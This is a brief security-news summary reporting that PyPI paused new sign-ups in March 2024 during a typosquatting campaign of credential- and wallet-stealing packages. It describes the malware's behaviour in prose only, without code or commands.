PyPI Halts Sign-Ups Amid Surge of Malicious Package Uploads Targeting Developers

PyPI Halts Sign-Ups Amid Surge of Malicious Package Uploads Targeting Developers

March 29, 2024 at 02:09AM

The Python Package Index (PyPI) temporarily halted new user sign-ups due to an influx of malicious projects aimed at developers. Threat actors used typosquatting to upload deceptive versions of popular packages, targeting sensitive data and crypto wallets. Over 500 suspicious packages were uploaded within days, highlighting the increasing risk of supply chain attacks.

From the meeting notes dated Mar 29, 2024:
– The Python Package Index (PyPI) repository suspended new user sign-ups briefly due to a malware upload campaign, involving typosquatted versions of popular packages.
– The attack aimed to steal crypto wallets, sensitive browser data, and various credentials, employing a persistence mechanism to survive reboots.
– More than 100 malicious packages targeted machine learning (ML) libraries like Pytorch, Matplotlib, and Selenium, posing a threat to enterprise environments.
– Over 500 deceptive variants were uploaded from a unique account starting March 26, 2024, and the decentralized nature of the uploads complicates efforts to identify them.
– The attackers published variations of several popular packages, checking if the installer’s operating system was Windows and deploying an obfuscated payload from an actor-controlled domain.
– The malware functions as a stealer, extracting files, Discord tokens, browser data, and cryptocurrency wallets to a server, and attempts to achieve persistence by downloading a Python script to the Windows Startup folder.
– This incident highlights the increasing risk of software supply chain attacks, emphasizing the need for developers to thoroughly evaluate third-party components for potential threats.
– Notably, PyPI has previously suspended new user registrations in May 2023 and December 2023 due to similar reasons.

Full Article